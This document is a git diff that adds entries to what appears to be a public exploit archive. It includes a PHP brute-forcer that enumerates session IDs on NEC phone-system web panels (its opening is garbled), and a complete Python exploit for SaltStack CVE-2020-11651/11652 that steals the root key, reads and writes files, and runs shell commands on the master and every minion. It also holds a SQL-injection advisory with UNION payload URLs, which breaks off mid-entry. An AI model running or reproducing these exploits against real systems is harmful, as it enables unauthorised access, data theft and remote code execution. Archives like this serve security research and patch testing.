diff --git a/exploits/hardware/webapps/48425.txt b/exploits/hardware/webapps/48425.txt
new file mode 100644
index 000000000..c4a51d59b
--- /dev/null
+++ b/exploits/hardware/webapps/48425.txt
@@ -0,0 +1,63 @@
+# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
+# Author: Cold z3ro
+# Date: 2020-05-04
+# Homepage: https://www.0x30.cc/
+# Vendor Homepage: https://www.nec.com
+# Version: 01.03.01
+# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration
+
+= $maxproc)
+ {
+ while (pcntl_waitpid(0, $status) != -1)
+ {
+ $status = pcntl_wexitstatus($status);
+ $execute =0;
+ usleep(3000);
+ }
+ }
+ if (!$pid)
+ {
+ echo $url . " checking $i\n";
+ login($url, $i);
+ flush();
+ exit;
+ }
+}
+
+
+function login($url, $key)
+{
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#');
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
+ curl_setopt($ch, CURLOPT_TIMEOUT, 80);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
+ curl_setopt($ch, CURLOPT_HEADER, FALSE);
+ $content = curl_exec($ch);
+ curl_close ($ch);
+ if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content))
+ {
+ die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n");
+
+ }
+}
\ No newline at end of file
diff --git a/exploits/multiple/remote/48421.txt b/exploits/multiple/remote/48421.txt
new file mode 100644
index 000000000..5bd051b35
--- /dev/null
+++ b/exploits/multiple/remote/48421.txt
@@ -0,0 +1,393 @@
+# Exploit Title: Saltstack 3000.1 - Remote Code Execution
+# Date: 2020-05-04
+# Exploit Author: Jasper Lievisse Adriaanse
+# Vendor Homepage: https://www.saltstack.com/
+# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
+# Tested on: Debian 10 with Salt 2019.2.0
+# CVE : CVE-2020-11651 and CVE-2020-11652
+# Discription: Saltstack authentication bypass/remote code execution
+#
+# Source: https://github.com/jasperla/CVE-2020-11651-poc
+# This exploit is based on this checker script:
+# https://github.com/rossengeorgiev/salt-security-backports
+
+#!/usr/bin/env python
+#
+# Exploit for CVE-2020-11651 and CVE-2020-11652
+# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)
+# This exploit is based on this checker script:
+# https://github.com/rossengeorgiev/salt-security-backports
+
+from __future__ import absolute_import, print_function, unicode_literals
+import argparse
+import datetime
+import os
+import os.path
+import sys
+import time
+
+import salt
+import salt.version
+import salt.transport.client
+import salt.exceptions
+
+def init_minion(master_ip, master_port):
+ minion_config = {
+ 'transport': 'zeromq',
+ 'pki_dir': '/tmp',
+ 'id': 'root',
+ 'log_level': 'debug',
+ 'master_ip': master_ip,
+ 'master_port': master_port,
+ 'auth_timeout': 5,
+ 'auth_tries': 1,
+ 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)
+ }
+
+ return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')
+
+# --- check funcs ----
+
+def check_salt_version():
+ print("[+] Salt version: {}".format(salt.version.__version__))
+
+ vi = salt.version.__version_info__
+
+ if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):
+ return True
+ else:
+ return False
+
+def check_connection(master_ip, master_port, channel):
+ print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
+ sys.stdout.flush()
+
+ # connection check
+ try:
+ channel.send({'cmd':'ping'}, timeout=2)
+ except salt.exceptions.SaltReqTimeoutError:
+ print("OFFLINE")
+ sys.exit(1)
+ else:
+ print("ONLINE")
+
+def check_CVE_2020_11651(channel):
+ print("[+] Checking if vulnerable to CVE-2020-11651... ", end='')
+ sys.stdout.flush()
+ # try to evil
+ try:
+ rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
+ except salt.exceptions.SaltReqTimeoutError:
+ print("YES")
+ except:
+ print("ERROR")
+ raise
+ else:
+ pass
+ finally:
+ if rets:
+ root_key = rets[2]['root']
+ return root_key
+
+ return None
+
+def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):
+ print("[+] Checking if vulnerable to CVE-2020-11652 (read_token)... ", end='')
+ sys.stdout.flush()
+
+ # try read file
+ msg = {
+ 'cmd': 'get_token',
+ 'arg': [],
+ 'token': top_secret_file_path,
+ }
+
+ try:
+ rets = channel.send(msg, timeout=3)
+ except salt.exceptions.SaltReqTimeoutError:
+ print("YES")
+ except:
+ print("ERROR")
+ raise
+ else:
+ if debug:
+ print()
+ print(rets)
+ print("NO")
+
+def check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):
+ print("[+] Checking if vulnerable to CVE-2020-11652 (read)... ", end='')
+ sys.stdout.flush()
+
+ # try read file
+ msg = {
+ 'key': root_key,
+ 'cmd': 'wheel',
+ 'fun': 'file_roots.read',
+ 'path': top_secret_file_path,
+ 'saltenv': 'base',
+ }
+
+ try:
+ rets = channel.send(msg, timeout=3)
+ except salt.exceptions.SaltReqTimeoutError:
+ print("TIMEOUT")
+ except:
+ print("ERROR")
+ raise
+ else:
+ if debug:
+ print()
+ print(rets)
+ if rets['data']['return']:
+ print("YES")
+ else:
+ print("NO")
+
+def check_CVE_2020_11652_write1(debug, channel, root_key):
+ print("[+] Checking if vulnerable to CVE-2020-11652 (write1)... ", end='')
+ sys.stdout.flush()
+
+ # try read file
+ msg = {
+ 'key': root_key,
+ 'cmd': 'wheel',
+ 'fun': 'file_roots.write',
+ 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',
+ 'data': 'evil',
+ 'saltenv': 'base',
+ }
+
+ try:
+ rets = channel.send(msg, timeout=3)
+ except salt.exceptions.SaltReqTimeoutError:
+ print("TIMEOUT")
+ except:
+ print("ERROR")
+ raise
+ else:
+ if debug:
+ print()
+ print(rets)
+
+ pp(rets)
+ if rets['data']['return'].startswith('Wrote'):
+ try:
+ os.remove('/tmp/salt_CVE_2020_11652')
+ except OSError:
+ print("Maybe?")
+ else:
+ print("YES")
+ else:
+ print("NO")
+
+def check_CVE_2020_11652_write2(debug, channel, root_key):
+ print("[+] Checking if vulnerable to CVE-2020-11652 (write2)... ", end='')
+ sys.stdout.flush()
+
+ # try read file
+ msg = {
+ 'key': root_key,
+ 'cmd': 'wheel',
+ 'fun': 'config.update_config',
+ 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',
+ 'yaml_contents': 'evil',
+ 'saltenv': 'base',
+ }
+
+ try:
+ rets = channel.send(msg, timeout=3)
+ except salt.exceptions.SaltReqTimeoutError:
+ print("TIMEOUT")
+ except:
+ print("ERROR")
+ raise
+ else:
+ if debug:
+ print()
+ print(rets)
+ if rets['data']['return'].startswith('Wrote'):
+ try:
+ os.remove('/tmp/salt_CVE_2020_11652.conf')
+ except OSError:
+ print("Maybe?")
+ else:
+ print("YES")
+ else:
+ print("NO")
+
+def pwn_read_file(channel, root_key, path, master_ip):
+ print("[+] Attemping to read {} from {}".format(path, master_ip))
+ sys.stdout.flush()
+
+ msg = {
+ 'key': root_key,
+ 'cmd': 'wheel',
+ 'fun': 'file_roots.read',
+ 'path': path,
+ 'saltenv': 'base',
+ }
+
+ rets = channel.send(msg, timeout=3)
+ print(rets['data']['return'][0][path])
+
+def pwn_upload_file(channel, root_key, src, dest, master_ip):
+ print("[+] Attemping to upload {} to {} on {}".format(src, dest, master_ip))
+ sys.stdout.flush()
+
+ try:
+ fh = open(src, 'rb')
+ payload = fh.read()
+ fh.close()
+ except Exception as e:
+ print('[-] Failed to read {}: {}'.format(src, e))
+ return
+
+ msg = {
+ 'key': root_key,
+ 'cmd': 'wheel',
+ 'fun': 'file_roots.write',
+ 'saltenv': 'base',
+ 'data': payload,
+ 'path': dest,
+ }
+
+ rets = channel.send(msg, timeout=3)
+ print('[ ] {}'.format(rets['data']['return']))
+
+def pwn_exec(channel, root_key, cmd, master_ip, jid):
+ print("[+] Attemping to execute {} on {}".format(cmd, master_ip))
+ sys.stdout.flush()
+
+ msg = {
+ 'key': root_key,
+ 'cmd': 'runner',
+ 'fun': 'salt.cmd',
+ 'saltenv': 'base',
+ 'user': 'sudo_user',
+ 'kwarg': {
+ 'fun': 'cmd.exec_code',
+ 'lang': 'python',
+ 'code': "import subprocess;subprocess.call('{}',shell=True)".format(cmd)
+ },
+ 'jid': jid,
+ }
+
+ try:
+ rets = channel.send(msg, timeout=3)
+ except Exception as e:
+ print('[-] Failed to submit job')
+ return
+
+ if rets.get('jid'):
+ print('[+] Successfully scheduled job: {}'.format(rets['jid']))
+
+def pwn_exec_all(channel, root_key, cmd, master_ip, jid):
+ print("[+] Attemping to execute '{}' on all minions connected to {}".format(cmd, master_ip))
+ sys.stdout.flush()
+
+ msg = {
+ 'key': root_key,
+ 'cmd': '_send_pub',
+ 'fun': 'cmd.run',
+ 'user': 'root',
+ 'arg': [ "/bin/sh -c '{}'".format(cmd) ],
+ 'tgt': '*',
+ 'tgt_type': 'glob',
+ 'ret': '',
+ 'jid': jid
+ }
+
+ try:
+ rets = channel.send(msg, timeout=3)
+ except Exception as e:
+ print('[-] Failed to submit job')
+ return
+ finally:
+ if rets == None:
+ print('[+] Successfully submitted job to all minions.')
+ else:
+ print('[-] Failed to submit job')
+
+
+def main():
+ parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')
+ parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')
+ parser.add_argument('--port', '-p', dest='master_port', default='4506')
+ parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')
+ parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')
+ parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')
+ parser.add_argument('--read', '-r', dest='read_file')
+ parser.add_argument('--upload-src', dest='upload_src')
+ parser.add_argument('--upload-dest', dest='upload_dest')
+ parser.add_argument('--exec', dest='exec', help='Run a command on the master')
+ parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')
+ args = parser.parse_args()
+
+ print("[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.")
+ time.sleep(1)
+
+ # Both src and destination are required for uploads
+ if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):
+ print('[-] Must provide both --upload-src and --upload-dest')
+ sys.exit(1)
+
+ channel = init_minion(args.master_ip, args.master_port)
+
+ if check_salt_version():
+ print("[ ] This version of salt is vulnerable! Check results below")
+ elif args.force:
+ print("[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.")
+ else:
+ sys.exit()
+
+ check_connection(args.master_ip, args.master_port, channel)
+
+ root_key = check_CVE_2020_11651(channel)
+ if root_key:
+ print('\n[*] root key obtained: {}'.format(root_key))
+ else:
+ print('[-] Failed to find root key...aborting')
+ sys.exit(127)
+
+ if args.run_checks:
+ # Assuming this check runs on the master itself, create a file with "secret" content
+ # and abuse CVE-2020-11652 to read it.
+ top_secret_file_path = '/tmp/salt_cve_teta'
+ with salt.utils.fopen(top_secret_file_path, 'w') as fd:
+ fd.write("top secret")
+
+ # Again, this assumes we're running this check on the master itself
+ with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:
+ root_key = keyfd.read()
+
+ check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)
+ check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)
+ check_CVE_2020_11652_write1(debug, channel, root_key)
+ check_CVE_2020_11652_write2(debug, channel, root_key)
+ os.remove(top_secret_file_path)
+ sys.exit(0)
+
+ if args.read_file:
+ pwn_read_file(channel, root_key, args.read_file, args.master_ip)
+
+ if args.upload_src:
+ if os.path.isabs(args.upload_dest):
+ print('[-] Destination path must be relative; aborting')
+ sys.exit(1)
+ pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)
+
+
+ jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())
+
+ if args.exec:
+ pwn_exec(channel, root_key, args.exec, args.master_ip, jid)
+
+ if args.exec_all:
+ print("[!] Lester, is this what you want? Hit ^C to abort.")
+ time.sleep(2)
+ pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)
+
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/48413.txt b/exploits/php/webapps/48413.txt
index 4891a3f3a..50cc95f4f 100644
--- a/exploits/php/webapps/48413.txt
+++ b/exploits/php/webapps/48413.txt
@@ -31,11 +31,4 @@ Parameter file: /scp/slass.php
I used the name of the SLA for any ticket.
-## Risk : cookie information of the target user is obtained.
-
-# Bu e-posta mesajı ve eklerinde yer alan içerikler gönderildiği kişi ya da firmaya özeldir. Ayrıca hukuken de gizli olabilir. Hiçbir şekilde üçüncü kişilere açıklanamaz ve yayınlanamaz.
-# Eğer bu mesajı hataen aldıysanız lütfen durumu gönderen kişiye derhal bildiriniz ve mesajı sisteminizden siliniz. Mesajın yetkili alıcısı değilseniz hiçbir kısmını kopyalayamaz, başkasına
-# gönderemez veya hiçbir şekilde bu mesajı kullanamazsınız. Eğer mesajın yetkili alıcısı veya yetkili alıcısına iletmekten sorumlu kişi siz değilseniz, lütfen mesajı sisteminizden siliniz
-# ve göndereni uyarınız. İnternet iletişiminde tam güvenlik ve hatasız gönderim garanti edilemeyeceğinden; mesajın yerine ulaşmaması, geç ulaşması ya da içeriğinin bozulması gibi problemler
-# de oluşabilir. Gönderen ve GAİS (Gais Siber Güvenlik Teknolojileri Ltd. Şti.) bu mesajın içerdiği bilgilerin doğruluğu, bütünlüğü ve güncelliği konusunda bir garanti vermemektedir.
-# Mesajın içeriğinden, iletilmesinden, alınmasından, saklanmasından, gizliliğinin korunmamasından, virüs içermesinden ve sisteminizde yaratabileceği olası zararlardan GAİS sorumlu tutulamaz.
\ No newline at end of file
+## Risk : cookie information of the target user is obtained.
\ No newline at end of file
diff --git a/exploits/php/webapps/48417.txt b/exploits/php/webapps/48417.txt
new file mode 100644
index 000000000..b54b9766e
--- /dev/null
+++ b/exploits/php/webapps/48417.txt
@@ -0,0 +1,143 @@
+# Title: Fishing Reservation System 7.5 - 'uid' SQL Injection
+# Author: Vulnerability Laboratory
+# Date: 2020-05-05
+# Vendor: https://fishingreservationsystem.com/index.html
+# Software: https://fishingreservationsystem.com/features.htm
+# CVE: N/A
+
+Document Title:
+===============
+Fishing Reservation System - Multiple Remote SQL Injection Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2243
+
+
+Common Vulnerability Scoring System:
+====================================
+7.5
+
+
+Product & Service Introduction:
+===============================
+(Copy of the Homepage: https://fishingreservationsystem.com/index.html
+& https://fishingreservationsystem.com/features.htm )
+
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-04: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+Multiple remote sql-injection web vulnerabilities has been discovered in
+the official Fishing Reservation System application.
+The vulnerability allows remote attackers to inject or execute own sql
+commands to compromise the dbms or file system of the application.
+
+The remote sql injection web vulnerabilites are located in the pid, type
+and uid parameters of the admin.php control panel file. Guest accounts or
+low privileged user accounts are able to inject and execute own
+malicious sql commands as statement to compromise the local database and
+affected
+management system. The request method to inject/execute is GET and the
+attack vector is client-side. The vulnerability is a classic order by
+remote
+sql injection web vulnerability.
+
+Exploitation of the remote sql injection vulnerability requires no user
+interaction and a low privileged web-application user / guest account.
+Successful exploitation of the remote sql injection results in database
+management system, web-server and web-application compromise.
+
+Request Method(s):
+[+] GET
+
+Vulnerable File(s):
+[+] cart.php
+[+] calender.php
+[+] admin.php
+
+Vulnerable Parameter(s):
+[+] uid
+[+] pid
+[+] type
+[+] m
+[+] y
+[+] code
+
+
+Proof of Concept (PoC):
+=======================
+The remote sql-injection web vulnerability can be exploited by remote
+attackers with guest access or low privileged user account and without
+user interaction action.
+For security demonstration or to reproduce the remote sql injection web
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Example
+https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid='[SQL-INJECTION!]--
+https://frs.localhost:8080/system/admin.php?page=product/edit&type='[SQL-INJECTION!]--
+https://frs.localhost:8080/system/admin.php?page=user/edit&uid='[SQL-INJECTION!]--&PHPSESSID=
+-
+https://frs.localhost:8080/system/calendar.php?m='[SQL-INJECTION!]--&y=20&PHPSESSID=
+https://frs.localhost:8080/system/calendar.php?m=02&y='[SQL-INJECTION!]--&PHPSESSID=
+https://frs.localhost:8080/system/modules/cart.php?code='[SQL-INJECTION!]--&PHPSESSID=
+
+
+PoC: Exploitation (SQL-Injection)
+https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
+https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID=
+https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
+-
+https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID=
+https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
+https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
+
+
+
+PoC: Exploit
+
+
+Fishing Reservation System - SQL INJECTION EXPLOIT (PoC)
+